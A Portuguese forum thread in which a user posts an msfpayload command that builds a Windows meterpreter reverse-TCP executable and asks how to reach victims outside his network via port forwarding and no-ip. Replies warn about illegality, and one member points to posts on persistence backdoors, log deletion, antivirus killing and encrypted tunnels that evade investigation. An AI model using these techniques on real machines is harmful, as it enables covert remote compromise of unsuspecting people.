Jump to content
zeandre

Metasploit: multi/handler

Recommended Posts

zeandre

Boas,

Eu uso o exploit multi/handler

crio um arquivo (msfpayload windows/meterpreter/reverse_tcp lhost=xxx.xxx.xx.xx lport=xxxx X > /root/ooo.exe) e executo na maquina alvo. da tudo certo. mas apenas consigo na mesma rede.

eu queria estar em casa e uma pessoa executar o ficheiro em qualquer parte do mundo e eu pela internet ligar-me a ela.

ja tentei usar o no-ip mas da erro...

obrigado

zeandre

Share this post


Link to post
Share on other sites
KTachyon

Assumindo que estás dentro de uma rede doméstica, se não tiveres o port forwarding configurado, é normal que de fora ninguém se consiga ligar a ti.


“There are two ways of constructing a software design: One way is to make it so simple that there are obviously no deficiencies, and the other way is to make it so complicated that there are no obvious deficiencies. The first method is far more difficult.”

-- Tony Hoare

Share this post


Link to post
Share on other sites
zeandre

Então se eu configurar o port forwarding e no payload colocar o ip do no-ip. e mandar a pessoa por msn. vou conseguir aceder a pessoa?

Obrigrado, ANdré Gomes

Share this post


Link to post
Share on other sites
zeandre

Não, porque a vitima tem conhecimento do que faço.

Apenas é usado para testes. E para ter mais conhecimento em segurança, pois é uma area que quero seguir e tenho de saber como se faz

Share this post


Link to post
Share on other sites
Localhost

Então, como o KTachyon te disse tens que configurar o port forwarding para permitir que a pessoa se conecte a ti. Vê se este site tem algo que te interessa: http://portforward.com/.

Não sei bem o que é que pretendes "enviar pelo msn" à pessoa...


here since 2009

Share this post


Link to post
Share on other sites
apocsantos

    Boa tarde,

    Porquê o envio por msn e o envio "camuflado" do no-ip, se é uma situação para testes? Atenção que usar isso para outros fins é ilícito.

    Esclarece melhor a ideia sff.

Cordiais cumprimentos,

Apocsantos


"A paciência é uma das coisas que se aprendeu na era do 48k" O respeito é como a escrita de código, uma vez perdido, dificilmente se retoma o habito"

Share this post


Link to post
Share on other sites
zeandre

Eu dei o exemplo do msn para voces perceberem, eu vou dar o ficheiro a pessoa e ela vai executar o ficheiro com total conhecimento. Usei para testes computadores aqui de casa e isso já consigo. Agora como faço para fora da minha rede é que queria saber.. Obrigado

Share this post


Link to post
Share on other sites
herakty

ALERTO TAMBÉM PARA O FACTO DE O USO DE EXPLOITS EM PC´S/SERVIDORES QUE NÃO VOS PEREÇAM OU TENHAM ACESSO É CRIME.

MAS HÁ UMA PROFISSÃO QUE É PEN TESTER (Testes de Intrusão) QUE É MUITO ÚTIL E CADA VEZ MAIS "RECORRIDA", NA QUAL SE USAM TÉCNICAS DE CRACKING PARA VERIFICAR POSSIVEIS FALHAS DE SEGURANÇA DE UM FORMA PROFISSIONAL, ANTES QUE OUTROS COM MÁS INTENÇÕES AS DESCUBRAM. PARA TAL É PRECISO SABER-SE TUDO SOBRE CRACKING (quase tudo ;))

chamo também a atenção aos programadores para se informarem sobre estas coisas, nem que seja de forma supercial, para poderem proteger as vossas aplicações destes ataques. eu acho essencial a qualquer programador ou sys admin... mas é a minha opinião

e sobre o assunto eu diria que mais uma vez estamos com o problema de o P@P ser um fórum e não um SITE DE E-LEARNING com base no SMF e não no Moodle, que permitiria cursos, lições e organizar a info de uma forma que não fique perdida, pois há montes de POSTS feitos por mim (não é para créditos mas porque um gajo dedica horas a fazer posts e depois essa info perde-se nas muitas páginas de uma secção. E digo isto porque esta resposta foi respondida de um forma muito boa num post meu e como não vale a pena REIVENTAR A RODA, APRESENTO ESTES MATERIAIS e vou postar sobre um local muito bom para aprendizagem do metasploit, desde beginers até experts. Claro que o metasploit por permitir módulos e scripts é infinito.

Manter acesso à maquina vitima com o metasploit - BackDoor Persistance (o metasploit é tão brutal e tão modular que tem evoluido com o contributo de todos e como permite scripts e integração de módulos podem-se automatizar estas situações e já há um SCRIPT CHAMADO "Persistance" que faz tudo o que é preciso para a pergunta inicial que não vi ninguem responder de forma técnica e com a atitude de Pen Tester e não de criminoso. Neste post, e claro e dou os caminhos a explorar para que os Script Kiddies não possam fazer asneiras sem se aperceberem. Mas tá tudo o que precisas saber, pelo que já vi saberes do metasploit.

http://www.portugal-a-programar.org/forum/index.php/topic,46124.0.

e aproveito para RELEMBRAR ALGUNS POSTS muito interessantes sobre esta ferramenta TÃO BRUTAL QUE É O METASPLOIT... para mim é um sonho tornado realidade e também para apresentar uma espécia de metasploit, mas completamente vocacionada para o VECTOR WEB (SQL Injection e XSS com shell remotas e manipulação de dados e execução de comandos no servidor, a W3AF

Web Aplication Attack and Audit Framework com referencias de estudo para esta brutal framework que mudou o mundo da web (sites e não só)

http://www.portugal-a-programar.pt/index.php?showtopic=31662

VÁRIOS POSTS QUE CHAMO A ATENÇÃO SOBRE O METASPLOIT

BE A NINJA Post-Exploitation-Log-Deletion-and-AV-Killing (este está na linha do post exploitation e pode ser interessante no contexto da pergunta.)

http://www.portugal-a-programar.pt/index.php?showtopic=37722

Ataque por email - Nessus Scanning through a Metasploit Meterpreter Session (ver uma excelente utilização do meterpreter e o uso do port forwarding sobre um canal encriptado. Isto pode ser útil não só para ter um canal encriptado, mas claro... hoje deve-se usar canais encriptados (no fundo VPN´s) sobre SSH, pois assim nenhum equipamento de defesa consegue saber o que se passa e não bloqueia ou loga bem, como se houver investigação... tá tudo encriptado. mas tem questões sobre port forwarding que te podem interessar

http://www.portugal-a-programar.pt/index.php?showtopic=38404

Measploit - Várias funcionlidades brutais - poder TOTAL

http://www.portugal-a-programar.pt/index.php?showtopic=38565

Como funcionam os ataques via browser e com o metasploit

http://www.portugal-a-programar.pt/index.php?showtopic=38563

Measploit - Usar os ultimos exploits da Adobe e PDF´s

http://www.portugal-a-programar.pt/index.php?showtopic=38566

teckV - NSF - CDS - ANON

Share this post


Link to post
Share on other sites
zeandre

herakty muito obrigado pelos posts, nao sabia que existiam.

André Gomes

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×
×
  • Create New...

Important Information

By using this site you accept our Terms of Use and Privacy Policy. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.